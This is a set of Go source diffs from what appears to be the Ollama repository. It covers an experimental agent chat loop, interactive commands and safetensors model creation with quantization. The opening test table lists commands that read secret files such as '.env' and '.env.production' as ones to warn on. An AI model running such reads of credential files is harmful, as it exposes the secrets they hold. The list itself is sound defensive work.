{"cat .env", true, ".env"},
{"cat .env.local", true, ".env.local"},
{"cat .env.production", true, ".env.production"},
{"cat config/.env", true, ".env"},
// Not warned (regular commands)
{"curl http://example.com", false, ""},
{"curl -X GET http://api.com", false, ""},
{"wget http://example.com", false, ""},
{"cat main.go", false, ""},
{"ls -la", false, ""},
{"git status", false, ""},
{"cat environment.txt", false, ""}, // Contains "env" but not ".env"
}
for _, tt := range tests {
t.Run(tt.command, func(t *testing.T) {
warned, pattern := IsWarn(tt.command)
if warned != tt.warned {
t.Errorf("IsWarn(%q) warned = %v, expected %v", tt.command, warned, tt.warned)
}
if tt.warned && !strings.Contains(pattern, tt.contains) && !strings.Contains(tt.contains, pattern) {
t.Errorf("IsWarn(%q) pattern = %q, expected to contain %q", tt.command, pattern, tt.contains)
}
})
}
}
func TestIsCommandOutsideCwd(t *testing.T) {
tests := []struct {
name string

View File

@@ -9,6 +9,7 @@ import (
"net/url"
"os"
"os/signal"
"slices"
"strings"
"syscall"
"time"
@@ -130,6 +131,7 @@ type RunOptions struct {
KeepAlive *api.Duration
Think *api.ThinkValue
HideThinking bool
Verbose bool
// Agent fields (managed externally for session persistence)
Tools *tools.Registry
@@ -178,6 +180,7 @@ func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
var thinkTagClosed bool = false
var pendingToolCalls []api.ToolCall
var consecutiveErrors int // Track consecutive 500 errors for retry limit
var latest api.ChatResponse
role := "assistant"
messages := opts.Messages
@@ -187,6 +190,7 @@ func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
p.StopAndClear()
}
latest = response
role = response.Message.Role
if response.Message.Thinking != "" && !opts.HideThinking {
if !thinkTagOpened {
@@ -364,10 +368,11 @@ func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
}
// Check if command is auto-allowed (safe command)
if agent.IsAutoAllowed(cmd) {
fmt.Fprintf(os.Stderr, "\033[1mauto-allowed:\033[0m %s\n", formatToolShort(toolName, args))
skipApproval = true
}
// TODO(parthsareen): re-enable with tighter scoped allowlist
// if agent.IsAutoAllowed(cmd) {
// fmt.Fprintf(os.Stderr, "\033[1mauto-allowed:\033[0m %s\n", formatToolShort(toolName, args))
// skipApproval = true
// }
}
}
@@ -482,6 +487,10 @@ func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
fmt.Println()
}
if opts.Verbose {
latest.Summary()
}
return &api.Message{Role: role, Thinking: thinkingContent.String(), Content: fullResponse.String()}, nil
}
@@ -633,12 +642,13 @@ func checkModelCapabilities(ctx context.Context, modelName string) (supportsTool
// GenerateInteractive runs an interactive agent session.
// This is called from cmd.go when --experimental flag is set.
// If yoloMode is true, all tool approvals are skipped.
func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, options map[string]any, think *api.ThinkValue, hideThinking bool, keepAlive *api.Duration, yoloMode bool) error {
// If enableWebsearch is true, the web search tool is registered.
func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, options map[string]any, think *api.ThinkValue, hideThinking bool, keepAlive *api.Duration, yoloMode bool, enableWebsearch bool) error {
scanner, err := readline.New(readline.Prompt{
Prompt: ">>> ",
AltPrompt: "... ",
Placeholder: "Send a message (/? for help)",
AltPlaceholder: `Use """ to end multi-line input`,
AltPlaceholder: "Press Enter to send",
})
if err != nil {
return err
@@ -658,14 +668,28 @@ func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, op
var toolRegistry *tools.Registry
if supportsTools {
toolRegistry = tools.DefaultRegistry()
if toolRegistry.Count() > 0 {
fmt.Fprintf(os.Stderr, "\033[90mtools available: %s\033[0m\n", strings.Join(toolRegistry.Names(), ", "))
// Register web search and web fetch tools if enabled via flag
if enableWebsearch {
toolRegistry.RegisterWebSearch()
toolRegistry.RegisterWebFetch()
}
if toolRegistry.Has("bash") {
fmt.Fprintln(os.Stderr)
fmt.Fprintln(os.Stderr, "This experimental version of Ollama has the \033[1mbash\033[0m tool enabled.")
fmt.Fprintln(os.Stderr, "Models can read files on your computer, or run commands (after you allow them).")
fmt.Fprintln(os.Stderr)
}
if toolRegistry.Has("web_search") || toolRegistry.Has("web_fetch") {
fmt.Fprintln(os.Stderr, "The \033[1mWeb Search\033[0m and \033[1mWeb Fetch\033[0m tools are enabled. Models can search and fetch web content via ollama.com.")
fmt.Fprintln(os.Stderr)
}
if yoloMode {
fmt.Fprintf(os.Stderr, "\033[1mwarning:\033[0m yolo mode - all tool approvals will be skipped\n")
}
} else {
fmt.Fprintf(os.Stderr, "\033[1mnote:\033[0m model does not support tools - running in chat-only mode\n")
}
// Create approval manager for session
@@ -673,6 +697,8 @@ func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, op
var messages []api.Message
var sb strings.Builder
var format string
var system string
for {
line, err := scanner.Readline()
@@ -684,6 +710,7 @@ func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, op
if line == "" {
fmt.Println("\nUse Ctrl + d or /bye to exit.")
}
scanner.Prompt.UseAlt = false
sb.Reset()
continue
case err != nil:
@@ -703,6 +730,10 @@ func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, op
continue
case strings.HasPrefix(line, "/help"), strings.HasPrefix(line, "/?"):
fmt.Fprintln(os.Stderr, "Available Commands:")
fmt.Fprintln(os.Stderr, " /set Set session variables")
fmt.Fprintln(os.Stderr, " /show Show model information")
fmt.Fprintln(os.Stderr, " /load Load a different model")
fmt.Fprintln(os.Stderr, " /save Save session as a model")
fmt.Fprintln(os.Stderr, " /tools Show available tools and approvals")
fmt.Fprintln(os.Stderr, " /clear Clear session context and approvals")
fmt.Fprintln(os.Stderr, " /bye Exit")
@@ -712,6 +743,280 @@ func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, op
fmt.Fprintln(os.Stderr, " Ctrl+O Expand last tool output")
fmt.Fprintln(os.Stderr, "")
continue
case strings.HasPrefix(line, "/set"):
args := strings.Fields(line)
if len(args) > 1 {
switch args[1] {
case "history":
scanner.HistoryEnable()
case "nohistory":
scanner.HistoryDisable()
case "wordwrap":
wordWrap = true
fmt.Println("Set 'wordwrap' mode.")
case "nowordwrap":
wordWrap = false
fmt.Println("Set 'nowordwrap' mode.")
case "verbose":
if err := cmd.Flags().Set("verbose", "true"); err != nil {
return err
}
fmt.Println("Set 'verbose' mode.")
case "quiet":
if err := cmd.Flags().Set("verbose", "false"); err != nil {
return err
}
fmt.Println("Set 'quiet' mode.")
case "think":
thinkValue := api.ThinkValue{Value: true}
var maybeLevel string
if len(args) > 2 {
maybeLevel = args[2]
}
if maybeLevel != "" {
thinkValue.Value = maybeLevel
}
think = &thinkValue
// Check if model supports thinking
if client, err := api.ClientFromEnvironment(); err == nil {
if resp, err := client.Show(cmd.Context(), &api.ShowRequest{Model: modelName}); err == nil {
if !slices.Contains(resp.Capabilities, model.CapabilityThinking) {
fmt.Fprintf(os.Stderr, "warning: model %q does not support thinking output\n", modelName)
}
}
}
if maybeLevel != "" {
fmt.Printf("Set 'think' mode to '%s'.\n", maybeLevel)
} else {
fmt.Println("Set 'think' mode.")
}
case "nothink":
think = &api.ThinkValue{Value: false}
// Check if model supports thinking
if client, err := api.ClientFromEnvironment(); err == nil {
if resp, err := client.Show(cmd.Context(), &api.ShowRequest{Model: modelName}); err == nil {
if !slices.Contains(resp.Capabilities, model.CapabilityThinking) {
fmt.Fprintf(os.Stderr, "warning: model %q does not support thinking output\n", modelName)
}
}
}
fmt.Println("Set 'nothink' mode.")
case "format":
if len(args) < 3 || args[2] != "json" {
fmt.Println("Invalid or missing format. For 'json' mode use '/set format json'")
} else {
format = args[2]
fmt.Printf("Set format to '%s' mode.\n", args[2])
}
case "noformat":
format = ""
fmt.Println("Disabled format.")
case "parameter":
if len(args) < 4 {
fmt.Println("Usage: /set parameter <name> <value>")
continue
}
params := args[3:]
fp, err := api.FormatParams(map[string][]string{args[2]: params})
if err != nil {
fmt.Printf("Couldn't set parameter: %q\n", err)
continue
}
fmt.Printf("Set parameter '%s' to '%s'\n", args[2], strings.Join(params, ", "))
options[args[2]] = fp[args[2]]
case "system":
if len(args) < 3 {
fmt.Println("Usage: /set system <message>")
continue
}
system = strings.Join(args[2:], " ")
newMessage := api.Message{Role: "system", Content: system}
if len(messages) > 0 && messages[len(messages)-1].Role == "system" {
messages[len(messages)-1] = newMessage
} else {
messages = append(messages, newMessage)
}
fmt.Println("Set system message.")
continue
default:
fmt.Printf("Unknown command '/set %s'. Type /? for help\n", args[1])
}
} else {
fmt.Println("Usage: /set <parameter|system|history|format|wordwrap|think|verbose> [value]")
}
continue
case strings.HasPrefix(line, "/show"):
args := strings.Fields(line)
if len(args) > 1 {
client, err := api.ClientFromEnvironment()
if err != nil {
fmt.Println("error: couldn't connect to ollama server")
continue
}
req := &api.ShowRequest{
Name: modelName,
Options: options,
}
resp, err := client.Show(cmd.Context(), req)
if err != nil {
fmt.Println("error: couldn't get model")
continue
}
switch args[1] {
case "info":
fmt.Fprintf(os.Stderr, " Model\n")
fmt.Fprintf(os.Stderr, " %-16s %s\n", "Name", modelName)
if resp.Details.Family != "" {
fmt.Fprintf(os.Stderr, " %-16s %s\n", "Family", resp.Details.Family)
}
if resp.Details.ParameterSize != "" {
fmt.Fprintf(os.Stderr, " %-16s %s\n", "Parameter Size", resp.Details.ParameterSize)
}
if resp.Details.QuantizationLevel != "" {
fmt.Fprintf(os.Stderr, " %-16s %s\n", "Quantization", resp.Details.QuantizationLevel)
}
if len(resp.Capabilities) > 0 {
caps := make([]string, len(resp.Capabilities))
for i, c := range resp.Capabilities {
caps[i] = string(c)
}
fmt.Fprintf(os.Stderr, " %-16s %s\n", "Capabilities", strings.Join(caps, ", "))
}
fmt.Fprintln(os.Stderr)
case "license":
if resp.License == "" {
fmt.Println("No license was specified for this model.")
} else {
fmt.Println(resp.License)
}
case "modelfile":
fmt.Println(resp.Modelfile)
case "parameters":
fmt.Println("Model defined parameters:")
if resp.Parameters == "" {
fmt.Println(" No additional parameters were specified.")
} else {
for _, l := range strings.Split(resp.Parameters, "\n") {
fmt.Printf(" %s\n", l)
}
}
if len(options) > 0 {
fmt.Println("\nUser defined parameters:")
for k, v := range options {
fmt.Printf(" %-30s %v\n", k, v)
}
}
case "system":
switch {
case system != "":
fmt.Println(system + "\n")
case resp.System != "":
fmt.Println(resp.System + "\n")
default:
fmt.Println("No system message was specified for this model.")
}
case "template":
if resp.Template != "" {
fmt.Println(resp.Template)
} else {
fmt.Println("No prompt template was specified for this model.")
}
default:
fmt.Printf("Unknown command '/show %s'. Type /? for help\n", args[1])
}
} else {
fmt.Println("Usage: /show <info|license|modelfile|parameters|system|template>")
}
continue
case strings.HasPrefix(line, "/load"):
args := strings.Fields(line)
if len(args) != 2 {
fmt.Println("Usage: /load <modelname>")
continue
}
newModelName := args[1]
fmt.Printf("Loading model '%s'\n", newModelName)
// Create progress spinner
p := progress.NewProgress(os.Stderr)
spinner := progress.NewSpinner("")
p.Add("", spinner)
// Get client
client, err := api.ClientFromEnvironment()
if err != nil {
p.StopAndClear()
fmt.Println("error: couldn't connect to ollama server")
continue
}
// Check if model exists and get its info
info, err := client.Show(cmd.Context(), &api.ShowRequest{Model: newModelName})
if err != nil {
p.StopAndClear()
if strings.Contains(err.Error(), "not found") {
fmt.Printf("Couldn't find model '%s'\n", newModelName)
} else {
fmt.Printf("error: %v\n", err)
}
continue
}
// For cloud models, no need to preload
if info.RemoteHost == "" {
// Preload the model by sending an empty generate request
req := &api.GenerateRequest{
Model: newModelName,
Think: think,
}
err = client.Generate(cmd.Context(), req, func(r api.GenerateResponse) error {
return nil
})
if err != nil {
p.StopAndClear()
if strings.Contains(err.Error(), "not found") {
fmt.Printf("Couldn't find model '%s'\n", newModelName)
} else if strings.Contains(err.Error(), "does not support thinking") {
fmt.Printf("error: %v\n", err)
} else {
fmt.Printf("error loading model: %v\n", err)
}
continue
}
}
p.StopAndClear()
modelName = newModelName
messages = []api.Message{}
approval.Reset()
continue
case strings.HasPrefix(line, "/save"):
args := strings.Fields(line)
if len(args) != 2 {
fmt.Println("Usage: /save <modelname>")
continue
}
client, err := api.ClientFromEnvironment()
if err != nil {
fmt.Println("error: couldn't connect to ollama server")
continue
}
req := &api.CreateRequest{
Model: args[1],
From: modelName,
Parameters: options,
Messages: messages,
}
fn := func(resp api.ProgressResponse) error { return nil }
err = client.Create(cmd.Context(), req, fn)
if err != nil {
fmt.Printf("error: %v\n", err)
continue
}
fmt.Printf("Created new model '%s'\n", args[1])
continue
case strings.HasPrefix(line, "/"):
fmt.Printf("Unknown command '%s'. Type /? for help\n", strings.Fields(line)[0])
continue
@@ -723,10 +1028,12 @@ func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, op
newMessage := api.Message{Role: "user", Content: sb.String()}
messages = append(messages, newMessage)
verbose, _ := cmd.Flags().GetBool("verbose")
opts := RunOptions{
Model: modelName,
Messages: messages,
WordWrap: wordWrap,
Format: format,
Options: options,
Think: think,
HideThinking: hideThinking,
@@ -734,6 +1041,7 @@ func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, op
Tools: toolRegistry,
Approval: approval,
YoloMode: yoloMode,
Verbose: verbose,
}
assistant, err := Chat(cmd.Context(), opts)

282
x/create/client/create.go Normal file
View File

@@ -0,0 +1,282 @@
// Package client provides client-side model creation for safetensors-based models.
//
// This package is in x/ because the safetensors model storage format is under development.
// It also exists to break an import cycle: server imports x/create, so x/create
// cannot import server. This sub-package can import server because server doesn't
// import it.
package client
import (
"bytes"
"encoding/json"
"fmt"
"io"
"github.com/ollama/ollama/progress"
"github.com/ollama/ollama/server"
"github.com/ollama/ollama/types/model"
"github.com/ollama/ollama/x/create"
)
// MinOllamaVersion is the minimum Ollama version required for safetensors models.
const MinOllamaVersion = "0.14.0"
// ModelfileConfig holds configuration extracted from a Modelfile.
type ModelfileConfig struct {
Template string
System string
License string
}
// CreateOptions holds all options for model creation.
type CreateOptions struct {
ModelName string
ModelDir string
Quantize string // "fp8" for quantization
Modelfile *ModelfileConfig // template/system/license from Modelfile
}
// CreateModel imports a model from a local directory.
// This creates blobs and manifest directly on disk, bypassing the HTTP API.
// Automatically detects model type (safetensors LLM vs image gen) and routes accordingly.
func CreateModel(opts CreateOptions, p *progress.Progress) error {
// Detect model type
isSafetensors := create.IsSafetensorsModelDir(opts.ModelDir)
isImageGen := create.IsTensorModelDir(opts.ModelDir)
if !isSafetensors && !isImageGen {
return fmt.Errorf("%s is not a supported model directory (needs config.json + *.safetensors or model_index.json)", opts.ModelDir)
}
// Determine model type settings
var modelType, spinnerKey string
var capabilities []string
if isSafetensors {
modelType = "safetensors model"
spinnerKey = "create"
capabilities = []string{"completion"}
} else {
modelType = "image generation model"
spinnerKey = "imagegen"
capabilities = []string{"image"}
}
// Set up progress spinner
statusMsg := "importing " + modelType
spinner := progress.NewSpinner(statusMsg)
p.Add(spinnerKey, spinner)
progressFn := func(msg string) {
spinner.Stop()
statusMsg = msg
spinner = progress.NewSpinner(statusMsg)
p.Add(spinnerKey, spinner)
}
// Create the model using shared callbacks
var err error
if isSafetensors {
err = create.CreateSafetensorsModel(
opts.ModelName, opts.ModelDir, opts.Quantize,
newLayerCreator(), newTensorLayerCreator(),
newManifestWriter(opts, capabilities),
progressFn,
)
} else {
err = create.CreateImageGenModel(
opts.ModelName, opts.ModelDir, opts.Quantize,
newLayerCreator(), newTensorLayerCreator(),
newManifestWriter(opts, capabilities),
progressFn,
)
}
spinner.Stop()
if err != nil {
return err
}
fmt.Printf("Created %s '%s'\n", modelType, opts.ModelName)
return nil
}
// newLayerCreator returns a LayerCreator callback for creating config/JSON layers.
func newLayerCreator() create.LayerCreator {
return func(r io.Reader, mediaType, name string) (create.LayerInfo, error) {
layer, err := server.NewLayer(r, mediaType)
if err != nil {
return create.LayerInfo{}, err
}
return create.LayerInfo{
Digest: layer.Digest,
Size: layer.Size,
MediaType: layer.MediaType,
Name: name,
}, nil
}
}
// newTensorLayerCreator returns a QuantizingTensorLayerCreator callback for creating tensor layers.
// When quantize is non-empty, returns multiple layers (weight + scales + optional qbias).
func newTensorLayerCreator() create.QuantizingTensorLayerCreator {
return func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]create.LayerInfo, error) {
if quantize != "" {
return createQuantizedLayers(r, name, dtype, shape, quantize)
}
return createUnquantizedLayer(r, name)
}
}
// createQuantizedLayers quantizes a tensor and returns the resulting layers.
func createQuantizedLayers(r io.Reader, name, dtype string, shape []int32, quantize string) ([]create.LayerInfo, error) {
if !QuantizeSupported() {
return nil, fmt.Errorf("quantization requires MLX support")
}
// Quantize the tensor
qweightData, scalesData, qbiasData, _, _, _, err := quantizeTensor(r, name, dtype, shape, quantize)
if err != nil {
return nil, fmt.Errorf("failed to quantize %s: %w", name, err)
}
// Create layer for quantized weight
weightLayer, err := server.NewLayer(bytes.NewReader(qweightData), server.MediaTypeImageTensor)
if err != nil {
return nil, err
}
// Create layer for scales
scalesLayer, err := server.NewLayer(bytes.NewReader(scalesData), server.MediaTypeImageTensor)
if err != nil {
return nil, err
}
layers := []create.LayerInfo{
{
Digest: weightLayer.Digest,
Size: weightLayer.Size,
MediaType: weightLayer.MediaType,
Name: name,
},
{
Digest: scalesLayer.Digest,
Size: scalesLayer.Size,
MediaType: scalesLayer.MediaType,
Name: name + "_scale",
},
}
// Add qbiases layer if present (affine mode)
if qbiasData != nil {
qbiasLayer, err := server.NewLayer(bytes.NewReader(qbiasData), server.MediaTypeImageTensor)
if err != nil {
return nil, err
}
layers = append(layers, create.LayerInfo{
Digest: qbiasLayer.Digest,
Size: qbiasLayer.Size,
MediaType: qbiasLayer.MediaType,
Name: name + "_qbias",
})
}
return layers, nil
}
// createUnquantizedLayer creates a single tensor layer without quantization.
func createUnquantizedLayer(r io.Reader, name string) ([]create.LayerInfo, error) {
layer, err := server.NewLayer(r, server.MediaTypeImageTensor)
if err != nil {
return nil, err
}
return []create.LayerInfo{
{
Digest: layer.Digest,
Size: layer.Size,
MediaType: layer.MediaType,
Name: name,
},
}, nil
}
// newManifestWriter returns a ManifestWriter callback for writing the model manifest.
func newManifestWriter(opts CreateOptions, capabilities []string) create.ManifestWriter {
return func(modelName string, config create.LayerInfo, layers []create.LayerInfo) error {
name := model.ParseName(modelName)
if !name.IsValid() {
return fmt.Errorf("invalid model name: %s", modelName)
}
// Create config blob with version requirement
configData := model.ConfigV2{
ModelFormat: "safetensors",
Capabilities: capabilities,
Requires: MinOllamaVersion,
}
configJSON, err := json.Marshal(configData)
if err != nil {
return fmt.Errorf("failed to marshal config: %w", err)
}
// Create config layer blob
configLayer, err := server.NewLayer(bytes.NewReader(configJSON), "application/vnd.docker.container.image.v1+json")
if err != nil {
return fmt.Errorf("failed to create config layer: %w", err)
}
// Convert LayerInfo to server.Layer
serverLayers := make([]server.Layer, 0, len(layers))
for _, l := range layers {
serverLayers = append(serverLayers, server.Layer{
MediaType: l.MediaType,
Digest: l.Digest,
Size: l.Size,
Name: l.Name,
})
}
// Add Modelfile layers if present
if opts.Modelfile != nil {
modelfileLayers, err := createModelfileLayers(opts.Modelfile)
if err != nil {
return err
}
serverLayers = append(serverLayers, modelfileLayers...)
}
return server.WriteManifest(name, configLayer, serverLayers)
}
}
// createModelfileLayers creates layers for template, system, and license from Modelfile config.
func createModelfileLayers(mf *ModelfileConfig) ([]server.Layer, error) {
var layers []server.Layer
if mf.Template != "" {
layer, err := server.NewLayer(bytes.NewReader([]byte(mf.Template)), "application/vnd.ollama.image.template")
if err != nil {
return nil, fmt.Errorf("failed to create template layer: %w", err)
}
layers = append(layers, layer)
}
if mf.System != "" {
layer, err := server.NewLayer(bytes.NewReader([]byte(mf.System)), "application/vnd.ollama.image.system")
if err != nil {
return nil, fmt.Errorf("failed to create system layer: %w", err)
}
layers = append(layers, layer)
}
if mf.License != "" {
layer, err := server.NewLayer(bytes.NewReader([]byte(mf.License)), "application/vnd.ollama.image.license")
if err != nil {
return nil, fmt.Errorf("failed to create license layer: %w", err)
}
layers = append(layers, layer)
}
return layers, nil
}

View File

@@ -0,0 +1,146 @@
package client
import (
"testing"
)
func TestModelfileConfig(t *testing.T) {
// Test that ModelfileConfig struct works as expected
config := &ModelfileConfig{
Template: "{{ .Prompt }}",
System: "You are a helpful assistant.",
License: "MIT",
}
if config.Template != "{{ .Prompt }}" {
t.Errorf("Template = %q, want %q", config.Template, "{{ .Prompt }}")
}
if config.System != "You are a helpful assistant." {
t.Errorf("System = %q, want %q", config.System, "You are a helpful assistant.")
}
if config.License != "MIT" {
t.Errorf("License = %q, want %q", config.License, "MIT")
}
}
func TestModelfileConfig_Empty(t *testing.T) {
config := &ModelfileConfig{}
if config.Template != "" {
t.Errorf("Template should be empty, got %q", config.Template)
}
if config.System != "" {
t.Errorf("System should be empty, got %q", config.System)
}
if config.License != "" {
t.Errorf("License should be empty, got %q", config.License)
}
}
func TestModelfileConfig_PartialFields(t *testing.T) {
// Test config with only some fields set
config := &ModelfileConfig{
Template: "{{ .Prompt }}",
// System and License intentionally empty
}
if config.Template == "" {
t.Error("Template should not be empty")
}
if config.System != "" {
t.Error("System should be empty")
}
if config.License != "" {
t.Error("License should be empty")
}
}
func TestMinOllamaVersion(t *testing.T) {
// Verify the minimum version constant is set
if MinOllamaVersion == "" {
t.Error("MinOllamaVersion should not be empty")
}
if MinOllamaVersion != "0.14.0" {
t.Errorf("MinOllamaVersion = %q, want %q", MinOllamaVersion, "0.14.0")
}
}
func TestCreateModel_InvalidDir(t *testing.T) {
// Test that CreateModel returns error for invalid directory
err := CreateModel(CreateOptions{
ModelName: "test-model",
ModelDir: "/nonexistent/path",
}, nil)
if err == nil {
t.Error("expected error for nonexistent directory, got nil")
}
}
func TestCreateModel_NotSafetensorsDir(t *testing.T) {
// Test that CreateModel returns error for directory without safetensors
dir := t.TempDir()
err := CreateModel(CreateOptions{
ModelName: "test-model",
ModelDir: dir,
}, nil)
if err == nil {
t.Error("expected error for empty directory, got nil")
}
}
func TestCreateOptions(t *testing.T) {
opts := CreateOptions{
ModelName: "my-model",
ModelDir: "/path/to/model",
Quantize: "fp8",
Modelfile: &ModelfileConfig{
Template: "test",
System: "system",
License: "MIT",
},
}
if opts.ModelName != "my-model" {
t.Errorf("ModelName = %q, want %q", opts.ModelName, "my-model")
}
if opts.ModelDir != "/path/to/model" {
t.Errorf("ModelDir = %q, want %q", opts.ModelDir, "/path/to/model")
}
if opts.Quantize != "fp8" {
t.Errorf("Quantize = %q, want %q", opts.Quantize, "fp8")
}
if opts.Modelfile == nil {
t.Error("Modelfile should not be nil")
}
if opts.Modelfile.Template != "test" {
t.Errorf("Modelfile.Template = %q, want %q", opts.Modelfile.Template, "test")
}
}
func TestCreateOptions_Defaults(t *testing.T) {
opts := CreateOptions{
ModelName: "test",
ModelDir: "/tmp",
}
// Quantize should default to empty
if opts.Quantize != "" {
t.Errorf("Quantize should be empty by default, got %q", opts.Quantize)
}
// Modelfile should default to nil
if opts.Modelfile != nil {
t.Error("Modelfile should be nil by default")
}
}
func TestQuantizeSupported(t *testing.T) {
// This just verifies the function exists and returns a boolean
// The actual value depends on build tags (mlx vs non-mlx)
supported := QuantizeSupported()
// In non-mlx builds, this should be false
// We can't easily test both cases, so just verify it returns something
_ = supported
}

127
x/create/client/quantize.go Normal file
View File

@@ -0,0 +1,127 @@
//go:build mlx
package client
import (
"fmt"
"io"
"os"
"path/filepath"
"github.com/ollama/ollama/x/imagegen/mlx"
)
// quantizeTensor loads a tensor from safetensors format, quantizes it,
// and returns safetensors data for the quantized weights, scales, and biases.
// Supported quantization types: "fp8" (affine 8-bit)
// Uses MLX's native SaveSafetensors to ensure correct dtype handling (especially uint32 for quantized weights).
func quantizeTensor(r io.Reader, name, dtype string, shape []int32, quantize string) (qweightData, scalesData, qbiasData []byte, qweightShape, scalesShape, qbiasShape []int32, err error) {
tmpDir := ensureTempDir()
// Read safetensors data to a temp file (LoadSafetensorsNative needs a path)
tmpFile, err := os.CreateTemp(tmpDir, "quant-input-*.safetensors")
if err != nil {
return nil, nil, nil, nil, nil, nil, fmt.Errorf("failed to create temp file: %w", err)
}
tmpPath := tmpFile.Name()
defer os.Remove(tmpPath)
if _, err := io.Copy(tmpFile, r); err != nil {
tmpFile.Close()
return nil, nil, nil, nil, nil, nil, fmt.Errorf("failed to write temp file: %w", err)
}
tmpFile.Close()
// Load the tensor using MLX's native loader
st, err := mlx.LoadSafetensorsNative(tmpPath)
if err != nil {
return nil, nil, nil, nil, nil, nil, fmt.Errorf("failed to load safetensors: %w", err)
}
defer st.Free()
// Get the tensor (it's stored as "data" in our minimal safetensors format)
arr := st.Get("data")
if arr == nil {
return nil, nil, nil, nil, nil, nil, fmt.Errorf("tensor 'data' not found in safetensors")
}
// Convert to BFloat16 if needed (quantize expects float type)
if arr.Dtype() != mlx.DtypeBFloat16 && arr.Dtype() != mlx.DtypeFloat32 && arr.Dtype() != mlx.DtypeFloat16 {
arr = mlx.AsType(arr, mlx.DtypeBFloat16)
mlx.Eval(arr)
}
// Quantize based on quantization type
var qweight, scales, qbiases *mlx.Array
switch quantize {
case "fp8":
// affine mode: group_size=32, bits=8
qweight, scales, qbiases = mlx.Quantize(arr, 32, 8, "affine")
default:
return nil, nil, nil, nil, nil, nil, fmt.Errorf("unsupported quantization type: %s", quantize)
}
// Eval and make contiguous for data access
qweight = mlx.Contiguous(qweight)
scales = mlx.Contiguous(scales)
if qbiases != nil {
qbiases = mlx.Contiguous(qbiases)
mlx.Eval(qweight, scales, qbiases)
} else {
mlx.Eval(qweight, scales)
}
// Get shapes
qweightShape = qweight.Shape()
scalesShape = scales.Shape()
// Save quantized weight using MLX's native safetensors (correctly handles uint32 dtype)
qweightPath := filepath.Join(tmpDir, "qweight.safetensors")
defer os.Remove(qweightPath)
if err := mlx.SaveSafetensors(qweightPath, map[string]*mlx.Array{"data": qweight}); err != nil {
return nil, nil, nil, nil, nil, nil, fmt.Errorf("failed to save quantized weight: %w", err)
}
qweightData, err = os.ReadFile(qweightPath)
if err != nil {
return nil, nil, nil, nil, nil, nil, fmt.Errorf("failed to read quantized weight: %w", err)
}
// Save scales using MLX's native safetensors
scalesPath := filepath.Join(tmpDir, "scales.safetensors")
defer os.Remove(scalesPath)
if err := mlx.SaveSafetensors(scalesPath, map[string]*mlx.Array{"data": scales}); err != nil {
return nil, nil, nil, nil, nil, nil, fmt.Errorf("failed to save scales: %w", err)
}
scalesData, err = os.ReadFile(scalesPath)
if err != nil {
return nil, nil, nil, nil, nil, nil, fmt.Errorf("failed to read scales: %w", err)
}
// Affine mode returns qbiases for zero-point offset
if qbiases != nil {
qbiasShape = qbiases.Shape()
qbiasPath := filepath.Join(tmpDir, "qbias.safetensors")
defer os.Remove(qbiasPath)
if err := mlx.SaveSafetensors(qbiasPath, map[string]*mlx.Array{"data": qbiases}); err != nil {
return nil, nil, nil, nil, nil, nil, fmt.Errorf("failed to save qbiases: %w", err)
}
qbiasData, err = os.ReadFile(qbiasPath)
if err != nil {
return nil, nil, nil, nil, nil, nil, fmt.Errorf("failed to read qbiases: %w", err)
}
}
return qweightData, scalesData, qbiasData, qweightShape, scalesShape, qbiasShape, nil
}
// QuantizeSupported returns true if quantization is supported (MLX build)
func QuantizeSupported() bool {
return true
}
// ensureTempDir creates the temp directory for quantization if it doesn't exist
func ensureTempDir() string {
tmpDir := filepath.Join(os.TempDir(), "ollama-quantize")
os.MkdirAll(tmpDir, 0755)
return tmpDir
}

View File

@@ -0,0 +1,18 @@
//go:build !mlx
package client
import (
"fmt"
"io"
)
// quantizeTensor is not available without MLX
func quantizeTensor(r io.Reader, name, dtype string, shape []int32, quantize string) (qweightData, scalesData, qbiasData []byte, qweightShape, scalesShape, qbiasShape []int32, err error) {
return nil, nil, nil, nil, nil, nil, fmt.Errorf("quantization requires MLX support (build with mlx tag)")
}
// QuantizeSupported returns false when MLX is not available
func QuantizeSupported() bool {
return false
}

399
x/create/create.go Normal file
View File

@@ -0,0 +1,399 @@
package create
import (
"encoding/json"
"fmt"
"io"
"os"
"path/filepath"
"slices"
"strings"
"github.com/ollama/ollama/envconfig"
"github.com/ollama/ollama/x/imagegen/safetensors"
)
// ModelConfig represents the config blob stored with a model.
type ModelConfig struct {
ModelFormat string `json:"model_format"`
Capabilities []string `json:"capabilities"`
}
// Manifest represents the manifest JSON structure.
type Manifest struct {
SchemaVersion int `json:"schemaVersion"`
MediaType string `json:"mediaType"`
Config ManifestLayer `json:"config"`
Layers []ManifestLayer `json:"layers"`
}
// ManifestLayer represents a layer in the manifest.
type ManifestLayer struct {
MediaType string `json:"mediaType"`
Digest string `json:"digest"`
Size int64 `json:"size"`
Name string `json:"name,omitempty"`
}
// defaultManifestDir returns the manifest storage directory.
func defaultManifestDir() string {
return filepath.Join(envconfig.Models(), "manifests")
}
// defaultBlobDir returns the blob storage directory.
func defaultBlobDir() string {
return filepath.Join(envconfig.Models(), "blobs")
}
// resolveManifestPath converts a model name to a manifest file path.
func resolveManifestPath(modelName string) string {
host := "registry.ollama.ai"
namespace := "library"
name := modelName
tag := "latest"
if idx := strings.LastIndex(name, ":"); idx != -1 {
tag = name[idx+1:]
name = name[:idx]
}
parts := strings.Split(name, "/")
switch len(parts) {
case 3:
host = parts[0]
namespace = parts[1]
name = parts[2]
case 2:
namespace = parts[0]
name = parts[1]
}
return filepath.Join(defaultManifestDir(), host, namespace, name, tag)
}
// loadManifest loads a manifest for the given model name.
func loadManifest(modelName string) (*Manifest, error) {
manifestPath := resolveManifestPath(modelName)
data, err := os.ReadFile(manifestPath)
if err != nil {
return nil, err
}
var manifest Manifest
if err := json.Unmarshal(data, &manifest); err != nil {
return nil, err
}
return &manifest, nil
}
// loadModelConfig loads the config blob for a model.
